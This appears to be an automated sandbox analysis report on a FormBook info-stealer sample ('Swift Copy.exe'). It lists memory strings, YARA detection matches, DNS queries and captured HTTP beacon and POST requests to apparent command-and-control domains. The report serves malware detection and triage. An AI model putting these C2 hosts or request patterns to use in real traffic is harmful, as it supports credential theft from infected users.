45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:30:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 6

Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9
Source: Swift Copy.exe, ImUIYlbLTIh.exe.0.dr	String found in binary or memory: http://philiphanson.org/medius/book/1.0
Source: explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr$
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000019.00000002.518373021.00000000036A2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV
Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB
Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB

Source: unknown

HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).

Source: unknown

DNS traffic detected: queries for: www.blackyaga.xyz

Source: global traffic	HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1Host: www.blackyaga.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.expectedclosure.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1Host: www.kinemartigues.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.epic45.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1Host: www.mogdento.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: Swift Copy.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
